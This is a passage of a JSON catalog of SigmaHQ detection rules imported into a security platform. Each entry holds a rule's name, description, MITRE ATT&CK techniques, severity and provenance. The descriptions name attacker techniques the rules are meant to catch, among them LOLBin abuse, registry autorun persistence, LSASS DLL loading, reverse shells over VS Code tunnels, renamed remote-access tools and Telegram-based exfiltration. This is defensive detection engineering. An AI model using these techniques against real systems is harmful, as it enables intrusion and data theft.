"imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_directoryservices_accountmanagement.yml" } }, { "id": "sigmahq-sigma-b29aed60-ebd1-442b-9cb5-16a1d0324adb", "type": "detection", "name": "Wow6432Node CurrentVersion Autorun Keys Modification", "description": "Detects modification of autostart extensibility point (ASEP) in registry.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1547.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/wow6432node-currentversion-autorun-keys-modification.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b29aed60-ebd1-442b-9cb5-16a1d0324adb", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node.yml" } }, { "id": "sigmahq-sigma-b2b048b0-7857-4380-b0fb-d3f0ab820b71", "type": "detection", "name": "Self Extracting Package Creation Via Iexpress.EXE From Potentially Suspicious Location", "description": "Detects the use of iexpress.exe to create binaries via Self Extraction Directive (SED) files located in potentially suspicious locations.\nThis behavior has been observed in-the-wild by different threat actors.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/self-extracting-package-creation-via-iexpress-exe-from-potentially-suspicious-lo.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b2b048b0-7857-4380-b0fb-d3f0ab820b71", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_iexpress_susp_execution.yml" } }, { "id": "sigmahq-sigma-b2ddd389-f676-4ac4-845a-e00781a48e5f", "type": "detection", "name": "Using SettingSyncHost.exe as LOLBin", "description": "Detects using SettingSyncHost.exe to run hijacked binary", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1574.008" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/using-settingsynchost-exe-as-lolbin.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b2ddd389-f676-4ac4-845a-e00781a48e5f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_lolbin_settingsynchost.yml" } }, { "id": "sigmahq-sigma-b30a8bc5-e21b-4ca2-9420-0a94019ac56a", "type": "detection", "name": "Use of VisualUiaVerifyNative.exe", "description": "VisualUiaVerifyNative.exe is a Windows SDK that can be used for AWL bypass and is listed in Microsoft's recommended block rules.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/use-of-visualuiaverifynative-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b30a8bc5-e21b-4ca2-9420-0a94019ac56a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_lolbin_visualuiaverifynative.yml" } }, { "id": "sigmahq-sigma-b3503044-60ce-4bf4-bbcb-e3db98788823", "type": "detection", "name": "DLL Load via LSASS", "description": "Detects a method to load DLL via LSASS process using an undocumented Registry key", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1547.008" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/dll-load-via-lsass.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b3503044-60ce-4bf4-bbcb-e3db98788823", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_event/registry_event_susp_lsass_dll_load.yml" } }, { "id": "sigmahq-sigma-b3512211-c67e-4707-bedc-66efc7848863", "type": "detection", "name": "Potential PowerShell Downgrade Attack", "description": "Detects PowerShell downgrade attack by comparing the host versions with the actually used engine version 2.0", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-powershell-downgrade-attack.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b3512211-c67e-4707-bedc-66efc7848863", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_downgrade_attack.yml" } }, { "id": "sigmahq-sigma-b366adb4-d63d-422d-8a2c-186463b5ded0", "type": "detection", "name": "Use Get-NetTCPConnection", "description": "Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1049" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/use-get-nettcpconnection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b366adb4-d63d-422d-8a2c-186463b5ded0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_classic/posh_pc_susp_get_nettcpconnection.yml" } }, { "id": "sigmahq-sigma-b36d01a3-ddaf-4804-be18-18a6247adfcd", "type": "detection", "name": "Add Windows Capability Via PowerShell Cmdlet", "description": "Detects usage of the \"Add-WindowsCapability\" cmdlet to add Windows capabilities. Notable capabilities could be \"OpenSSH\" and others.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/add-windows-capability-via-powershell-cmdlet.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b36d01a3-ddaf-4804-be18-18a6247adfcd", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_add_windows_capability.yml" } }, { "id": "sigmahq-sigma-b37998de-a70b-4f33-b219-ec36bf433dc0", "type": "detection", "name": "PUA - PingCastle Execution From Potentially Suspicious Parent", "description": "Detects the execution of PingCastle, a tool designed to quickly assess the Active Directory security level via a script located in a potentially suspicious or uncommon location.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1595" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/pua-pingcastle-execution-from-potentially-suspicious-parent.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b37998de-a70b-4f33-b219-ec36bf433dc0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_pua_pingcastle_script_parent.yml" } }, { "id": "sigmahq-sigma-b3ad3c0f-c949-47a1-a30e-b0491ccae876", "type": "detection", "name": "Uncommon Connection to Active Directory Web Services", "description": "Detects uncommon network connections to the Active Directory Web Services (ADWS) from processes not typically associated with ADWS management.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1087" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/uncommon-connection-to-active-directory-web-services.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b3ad3c0f-c949-47a1-a30e-b0491ccae876", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/network_connection/net_connection_win_adws_unusual_connection.yml" } }, { "id": "sigmahq-sigma-b3cec4e7-6901-4b0d-a02d-8ab2d8eb818b", "type": "detection", "name": "File Time Attribute Change - Linux", "description": "Detect file time attribute change to hide new or changes to existing files.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1070.006" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/file-time-attribute-change-linux.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b3cec4e7-6901-4b0d-a02d-8ab2d8eb818b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/auditd/execve/lnx_auditd_change_file_time_attr.yml" } }, { "id": "sigmahq-sigma-b3d34dc5-2efd-4ae3-845f-8ec14921f449", "type": "detection", "name": "Browser Started with Remote Debugging", "description": "Detects browsers starting with the remote debugging flags. Which is a technique often used to perform browser injection attacks", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1185" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/browser-started-with-remote-debugging.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b3d34dc5-2efd-4ae3-845f-8ec14921f449", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_browsers_remote_debugging.yml" } }, { "id": "sigmahq-sigma-b3d57a5c-c92e-4b48-9a79-5f124b7cf964", "type": "detection", "name": "MSSQL SPProcoption Set", "description": "Detects when the a stored procedure is set or cleared for automatic execution in MSSQL. A stored procedure that is set to automatic execution runs every time an instance of SQL Server is started", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/mssql-spprocoption-set.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b3d57a5c-c92e-4b48-9a79-5f124b7cf964", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/application/mssqlserver/win_mssql_sp_procoption_set.yml" } }, { "id": "sigmahq-sigma-b3e6418f-7c7a-4fad-993a-93b65027a9f1", "type": "detection", "name": "DNS Query To Visual Studio Code Tunnels Domain", "description": "Detects DNS query requests to Visual Studio Code tunnel domains. Attackers can abuse that feature to establish a reverse shell or persistence on a machine.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1071.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/dns-query-to-visual-studio-code-tunnels-domain.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b3e6418f-7c7a-4fad-993a-93b65027a9f1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/dns_query/dns_query_win_vscode_tunnel_communication.yml" } }, { "id": "sigmahq-sigma-b439f47d-ef52-4b29-9a2f-57d8a96cb6b8", "type": "detection", "name": "WMI ActiveScriptEventConsumers Activity Via Scrcons.EXE DLL Load", "description": "Detects signs of the WMI script host process \"scrcons.exe\" loading scripting DLLs which could indicates WMI ActiveScriptEventConsumers EventConsumers activity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1546.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/wmi-activescripteventconsumers-activity-via-scrcons-exe-dll-load.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b439f47d-ef52-4b29-9a2f-57d8a96cb6b8", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_scrcons_wmi_scripteventconsumer.yml" } }, { "id": "sigmahq-sigma-b447f7de-1e53-4cbf-bfb4-f1f6d0b04e4e", "type": "detection", "name": "Suspicious Binaries and Scripts in Public Folder", "description": "Detects the creation of a file with a suspicious extension in the public folder, which could indicate potential malicious activity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1204" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-binaries-and-scripts-in-public-folder.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b447f7de-1e53-4cbf-bfb4-f1f6d0b04e4e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_susp_public_folder_extension.yml" } }, { "id": "sigmahq-sigma-b45ab1d2-712f-4f01-a751-df3826969807", "type": "detection", "name": "AWS STS GetSessionToken Misuse", "description": "Identifies the suspicious use of GetSessionToken. Tokens could be created and used by attackers to move laterally and escalate privileges.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1548", "T1550", "T1550.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/aws-sts-getsessiontoken-misuse.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b45ab1d2-712f-4f01-a751-df3826969807", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/aws/cloudtrail/aws_sts_getsessiontoken_misuse.yml" } }, { "id": "sigmahq-sigma-b45e3d6f-42c6-47d8-a478-df6bd6cf534c", "type": "detection", "name": "Local System Accounts Discovery - Linux", "description": "Detects enumeration of local system accounts. This information can help adversaries determine which local accounts exist on a system to aid in follow-on behavior.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1087.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/local-system-accounts-discovery-linux.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b45e3d6f-42c6-47d8-a478-df6bd6cf534c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_local_account.yml" } }, { "id": "sigmahq-sigma-b471f462-eb0d-4832-be35-28d94bdb4780", "type": "detection", "name": "Remote Access Tool - Renamed MeshAgent Execution - Windows", "description": "Detects the execution of a renamed instance of the Remote Monitoring and Management (RMM) tool, MeshAgent.\nRMM tools such as MeshAgent are commonly utilized by IT administrators for legitimate remote support and system management.\nHowever, malicious actors may exploit these tools by renaming them to bypass detection mechanisms, enabling unauthorized access and control over compromised systems.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1219.002", "T1036.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/remote-access-tool-renamed-meshagent-execution-windows.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b471f462-eb0d-4832-be35-28d94bdb4780", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_remote_access_tools_renamed_meshagent_execution.yml" } }, { "id": "sigmahq-sigma-b48492dc-c5ef-4572-8dff-32bc241c15c8", "type": "detection", "name": "Load Of RstrtMgr.DLL By A Suspicious Process", "description": "Detects the load of RstrtMgr DLL (Restart Manager) by a suspicious process.\nThis library has been used during ransomware campaigns to kill processes that would prevent file encryption by locking them (e.g. Conti ransomware, Cactus ransomware). It has also recently been seen used by the BiBi wiper for Windows.\nIt could also be used for anti-analysis purposes by shut downing specific processes.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1486", "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/load-of-rstrtmgr-dll-by-a-suspicious-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b48492dc-c5ef-4572-8dff-32bc241c15c8", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_dll_rstrtmgr_suspicious_load.yml" } }, { "id": "sigmahq-sigma-b4926b47-a9d7-434c-b3a0-adc3fa0bd13e", "type": "detection", "name": "Suspicious Double Extension Files", "description": "Detects dropped files with double extensions, which is often used by malware as a method to abuse the fact that Windows hide default extensions by default.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1036.007" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-double-extension-files.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b4926b47-a9d7-434c-b3a0-adc3fa0bd13e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_susp_double_extension.yml" } }, { "id": "sigmahq-sigma-b494b165-6634-483d-8c47-2026a6c52372", "type": "detection", "name": "Telegram API Access", "description": "Detects suspicious requests to Telegram API without the usual Telegram User-Agent", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1071.001", "T1102.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/telegram-api-access.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b494b165-6634-483d-8c47-2026a6c52372", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/web/proxy_generic/proxy_telegram_api.yml" } }, { "id": "sigmahq-sigma-b4a6d707-9430-4f5f-af68-0337f52d5c42", "type": "detection", "name": "Sign-in Failure Due to Conditional Access Requirements Not Met", "description": "Define a baseline threshold for failed sign-ins due to Conditional Access failures", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1110", "T1078.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/sign-in-failure-due-to-conditional-access-requirements-not-met.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b4a6d707-9430-4f5f-af68-0337f52d5c42", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/signin_logs/azure_conditional_access_failure.yml" } }, { "id": "sigmahq-sigma-b4c8da4a-1c12-46b0-8a2b-0a8521d03442", "type": "detection", "name": "Restricted Software Access By SRP", "description": "Detects restricted access to applications by the Software Restriction Policies (SRP) policy", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1072" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/restricted-software-access-by-srp.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b4c8da4a-1c12-46b0-8a2b-0a8521d03442", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/application/microsoft_windows_software_restriction_policies/win_software_restriction_policies_block.yml" } }, { "id": "sigmahq-sigma-b4dc61f5-6cce-468e-a608-b48b469feaa2", "type": "detection", "name": "DirLister Execution", "description": "Detect the usage of \"DirLister.exe\" a utility for quickly listing folder or drive contents. It was seen used by BlackCat ransomware to create a list of accessible directories and files.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1083" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/dirlister-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b4dc61f5-6cce-468e-a608-b48b469feaa2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_dirlister_execution.yml" } }, { "id": "sigmahq-sigma-b4e6b016-a2ac-4759-ad85-8000b300d61e", "type": "detection", "name": "OpenCanary - TFTP Request", "description": "Detects instances where a TFTP service on an OpenCanary node has had a request.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1041" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/opencanary-tftp-request.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b4e6b016-a2ac-4759-ad85-8000b300d61e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/opencanary/opencanary_tftp_request.yml" } }, { "id": "sigmahq-sigma-b52e84a3-029e-4529-b09b-71d19dd27e94", "type": "detection", "name": "Remote Access Tool - AnyDesk Execution", "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1219.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/remote-access-tool-anydesk-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b52e84a3-029e-4529-b09b-71d19dd27e94", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_remote_access_tools_anydesk.yml" } }, { "id": "sigmahq-sigma-b53317a0-8acf-4fd1-8de8-a5401e776b96", "type": "detection", "name": "Application Removed Via Wmic.EXE", "description": "Detects the removal or uninstallation of an application via \"Wmic.EXE\".", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1047" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/application-removed-via-wmic-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b53317a0-8acf-4fd1-8de8-a5401e776b96", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_wmic_uninstall_application.yml" } }, { "id": "sigmahq-sigma-b5522a23-82da-44e5-9c8b-e10ed8955f88", "type": "detection", "name": "Powershell Execute Batch Script", "description": "Adversaries may abuse the Windows command shell for execution.\nThe Windows command shell ([cmd](https://attack.mitre.org/software/S0106)) is the primary command prompt on Windows systems.\nThe Windows command prompt can be used to control almost any aspect of a system, with various permission levels required for different subsets of commands.\nBatch files (ex: .bat or .cmd) also provide the shell with a list of sequential commands to run, as well as normal scripting operations such as conditionals and loops.\nCommon uses of batch files include long or repetitive tasks, or the need to run the same set of commands on multiple system", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/powershell-execute-batch-script.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b5522a23-82da-44e5-9c8b-e10ed8955f88", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_susp_execute_batch_script.yml" } }, { "id": "sigmahq-sigma-b55ca2a3-7cff-4dda-8bdd-c7bfa63bf544", "type": "detection", "name": "DNS Query Tor .Onion Address - Sysmon", "description": "Detects DNS queries to an \".onion\" address related to Tor routing networks", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1090.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/dns-query-tor-onion-address-sysmon.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": 